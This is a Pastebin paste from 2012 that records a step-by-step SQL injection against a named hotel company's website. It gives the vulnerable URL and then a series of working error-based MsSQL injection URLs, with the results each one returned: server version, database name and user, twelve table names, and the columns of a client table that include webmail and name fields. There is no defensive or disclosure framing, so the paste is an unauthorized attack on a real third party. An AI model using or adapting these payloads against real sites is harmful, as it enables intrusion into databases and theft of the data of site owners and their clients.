API tools faq
paste
Advertisement
zerofreak

Tiaraa MsSQL Injection Progression

zerofreak
Jan 19th, 2012
249
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.63 KB | None | 0 0
raw download clone embed print report
  1. Website: http://www.tiara-hotels.com/
  2. Vulnerable Link: http://www.tiara-hotels.com/hotel.asp?id_hotel=1'
  3. Vulnerability: MsSQL Injection (Not Blind)
  4. ######################################################################################################################################################
  5. Version: X64 2010 64-bit Windows NT 5.2 Service Pack2
  6. http://www.tiara-hotels.com/hotel.asp?id_hotel=@@version
  7. ######################################################################################################################################################
  8. Database Name: tiaraSQL
  9. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,db_name())--
  10. ######################################################################################################################################################
  11. Current User: tiaraleitura
  12. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,user_name())--
  13. ######################################################################################################################################################
  14. Table1: table_CONTEUDOS
  15. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables))--
  16.  
  17. Table2: table_FREE_PAGES
  18. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS')))--
  19.  
  20. Table3: table_GALERIA
  21. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES')))--
  22.  
  23. Table4: table_GALERIA_BLOCO
  24. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA')))--
  25.  
  26. Table5: table_HEADER
  27. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO')))--
  28.  
  29. Table6: table_HOTEL
  30. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER')))--
  31.  
  32. Table7: table_CLIENTE
  33. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL')))--
  34.  
  35. Table8: table_LANDING_PAGE
  36. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE')))--
  37.  
  38. Table9: table_UTILIZADORES_HOTEL
  39. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE','table_LANDING_PAGE')))--
  40.  
  41. Table10: table_PRESS
  42. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE','table_LANDING_PAGE','table_UTILIZADORES_HOTEL')))--
  43.  
  44. Table11: table_PRESS_CATEGORIA
  45. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE','table_LANDING_PAGE','table_UTILIZADORES_HOTEL','table_PRESS')))--
  46.  
  47. Table12: table_PROMOCOES_HOTEL
  48. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('table_CONTEUDOS','table_FREE_PAGES','table_GALERIA','table_GALERIA_BLOCO','table_HEADER','table_HOTEL','table_CLIENTE','table_LANDING_PAGE','table_UTILIZADORES_HOTEL','table_PRESS','table_PRESS_CATEGORIA')))--
  49. #######################################################################
  50. #######################################################################
  51. Extracting column from table: "table_CLIENTE"
  52.  
  53. Column1: ID
  54. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'))--
  55.  
  56. Column2: CLIENTE
  57. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID')))--
  58.  
  59. Column3: ESTATISTICAS
  60. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE')))--
  61.  
  62. Column4: WEBMAIL
  63. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS')))--
  64.  
  65. Column5: AUTOR
  66. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL')))--
  67.  
  68. Column6: NOME
  69. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL','AUTOR')))--
  70.  
  71. Column7: URLSITE
  72. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL','AUTOR','NOME')))--
  73.  
  74. Column8: URLBLUESOFT
  75. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL','AUTOR','NOME','URLSITE')))--
  76.  
  77. Column9: upsize_ts
  78. http://www.tiara-hotels.com/hotel.asp?id_hotel=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table_CLIENTE'+and+column_name+not+in+('ID','CLIENTE','ESTATISTICAS','WEBMAIL','AUTOR','NOME','URLSITE','URLBLUESOFT')))--
  79. ######################################################################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!